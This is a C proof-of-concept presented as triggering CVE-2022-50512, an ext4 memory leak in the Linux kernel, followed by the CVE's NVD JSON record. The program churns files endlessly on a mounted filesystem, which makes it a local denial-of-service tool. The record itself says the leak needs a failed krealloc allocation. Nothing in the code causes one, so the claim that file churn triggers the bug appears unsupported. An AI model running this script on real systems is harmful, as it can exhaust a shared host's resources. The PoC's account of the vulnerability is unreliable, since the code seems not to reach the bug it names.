CVE-2022-50512

/* CVE-2022-50512 - Linux Kernel ext4 Memory Leak PoC * This PoC demonstrates how to trigger memory leak in ext4_fc_record_regions() * by repeatedly performing fast commit operations on ext4 filesystem. * * Note: Requires an ext4 filesystem mounted with fast_commit support. * Compile: gcc -o poc poc.c * Usage: ./poc /path/to/ext4/mountpoint */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <fcntl.h> #include <sys/stat.h> #include <sys/types.h> #include <dirent.h> #include <errno.h> #include <signal.h> #include <time.h> #define NUM_FILES 10000 #define FILE_SIZE 4096 #define MOUNT_POINT "/mnt/ext4_test" static volatile int running = 1; void signal_handler(int sig) { printf("\n[*] Caught signal %d, stopping...\n", sig); running = 0; } int create_and_modify_files(const char *path) { char filepath[512]; char buffer[FILE_SIZE]; int fd; int i; memset(buffer, 'A', FILE_SIZE); for (i = 0; i < NUM_FILES && running; i++) { snprintf(filepath, sizeof(filepath), "%s/leak_file_%d.tmp", path, i); /* Create file - triggers ext4 fast commit region recording */ fd = open(filepath, O_CREAT | O_WRONLY | O_TRUNC, 0644); if (fd < 0) { fprintf(stderr, "[-] Failed to create %s: %s\n", filepath, strerror(errno)); continue; } /* Write data to trigger journal/fast-commit operations */ if (write(fd, buffer, FILE_SIZE) != FILE_SIZE) { fprintf(stderr, "[-] Write failed: %s\n", strerror(errno)); } /* Modify file to trigger more region recording */ lseek(fd, 0, SEEK_SET); write(fd, buffer, FILE_SIZE / 2); close(fd); /* Rename to trigger more fast commit operations */ char newpath[512]; snprintf(newpath, sizeof(newpath), "%s/leak_file_%d.dat", path, i); rename(filepath, newpath); /* Unlink to add more regions to fast commit */ unlink(newpath); } return 0; } int main(int argc, char *argv[]) { const char *mount_point; struct timespec start, now; long elapsed; if (argc < 2) { mount_point = MOUNT_POINT; } else { mount_point = argv[1]; } printf("[*] CVE-2022-50512 ext4 Memory Leak PoC\n"); printf("[*] Target mount point: %s\n", mount_point); /* Verify the mount point exists and is writable */ if (access(mount_point, W_OK) != 0) { fprintf(stderr, "[-] Cannot write to %s: %s\n", mount_point, strerror(errno)); fprintf(stderr, "[-] Please ensure %s is an ext4 mount with fast_commit\n", mount_point); return 1; } signal(SIGINT, signal_handler); signal(SIGTERM, signal_handler); clock_gettime(CLOCK_MONOTONIC, &start); printf("[*] Starting memory leak trigger...\n"); printf("[*] Press Ctrl+C to stop\n\n"); while (running) { create_and_modify_files(mount_point); clock_gettime(CLOCK_MONOTONIC, &now); elapsed = (now.tv_sec - start.tv_sec); if (elapsed > 0 && elapsed % 10 == 0) { printf("[*] Running for %ld seconds...\n", elapsed); } } printf("[*] Done. Check kernel memory usage with 'dmesg' or 'slabtop'\n"); return 0; }

{"cve": {"id": "CVE-2022-50512", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:34.473", "lastModified": "2026-03-17T14:08:18.160", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: fix potential memory leak in ext4_fc_record_regions()\n\nAs krealloc may return NULL, in this case 'state->fc_regions' may not be\nfreed by krealloc, but 'state->fc_regions' already set NULL. Then will\nlead to 'state->fc_regions' memory leak."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.10", "versionEndExcluding": "5.10.150", "matchCriteriaId": "0CF7C831-3BE2-41A1-A518-A1E4AEBC5669"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.75", "matchCriteriaId": "6D945F46-F32F-4C09-8400-C3477E22A9FB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "5.19.17", "matchCriteriaId": "19B4C3A4-E5C3-41DC-BB14-BE72858E7D35"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0", "versionEndExcluding": "6.0.3", "matchCriteriaId": "5BCD8201-B847-4442-B894-70D430128DEF"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/2cfb769d60a2a57eb3566765428b6131cd16dcfe", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/417b0455a0b6d0f60a2930592731d1f8340e24be", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/518566e71ad86b7c2f1bf6d9caee9588bb7ac158", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7069d105c1f15c442b68af43f7fde784f3126739", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/a4058b869e6c5e517c79e30532a350d0f3115c3e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}